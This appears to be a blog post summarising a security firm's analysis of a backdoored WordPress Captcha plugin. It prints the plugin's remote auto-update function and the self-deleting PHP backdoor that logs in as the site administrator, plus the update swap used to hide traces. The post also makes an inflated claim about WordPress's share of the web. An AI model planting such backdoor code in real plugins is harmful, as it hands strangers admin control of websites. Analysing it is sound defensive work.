WordPress is the most using Content Management System in the world. 75% of the web is made up of wordpress. One of the reason for its huge success is the support of plugins which takes simple wordpress website to complex web application. Recently Captcha plugin got removed from their wordpress repository for its backdoor fraud.
Wordfence looked into the plugin when it was removed from repository. The thing that got attention is, it has large user base i.e 300K websites are using captcha plugin.
When they looked at the source code they have found this
function cptch_wp_plugin_auto_update() { require_once ('cptch_wp_auto_update.php'); global $cptch_plugin_info; $wptuts_plugin_current_version = $cptch_plugin_info['Version']; $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_pro_update.php'; $wptuts_plugin_slug = plugin_basename(__FILE__); new cptch_wp_auto_update($wptuts_plugin_current_version, $wptuts_plugin_remote_path, $wptuts_plugin_slug); }
Which starts update process and downloads a file from https://simplywordpress[dot]net/captcha/captcha_pro_update.php, As it was a zip file it extracts and installs itself over the copy of captcha plugin.
The downloaded files are similar but with a small code change in plugin-update.php, which is a backdoor.
@unlink(__FILE__); require('../../../wp-blog-header.php'); require('../../../wp-includes/pluggable.php'); $user_info = get_userdata(1); // Automatic login // $username = $user_info->user_login; $user = get_user_by('login', $username ); // Redirect URL // if ( !is_wp_error( $user ) ) { wp_clear_auth_cookie(); wp_set_current_user ( $user->ID ); wp_set_auth_cookie ( $user->ID ); $redirect_to = user_admin_url(); wp_safe_redirect( $redirect_to ); exit(); }
This backdoor allows attacker or plugin author to get unauthorized administrative access to the website that has this plugin installed. This backdoor creates a session with user ID 1 which is admin, sets authentication cookies and deletes them all by itself.
Another change in downloaded file is
< $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_pro_update.php'; --- > $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_free_update.php';
The code downloaded from https://simplywordpress[net]net/captcha/captcha_free_update.php is identical to what’s in the plugin repository, so triggering the same automatic update process removes all file system traces of the backdoor, making it look as if it was never there and helping the attacker avoid detection.
Why this is happened and who did this?
Previously this captcha plugin was owned by BestWebSoft. On September 5, 2017 it announced change in ownership without announcing the name of the owner.
Looking at the website from which the files are getting downloaded it was found that Stacy Wellington was the registrar and he is Plugin spam guy who owns plugins which has huge userbase and installs backlinks to increase google page rank in SERPs.
Leave a Reply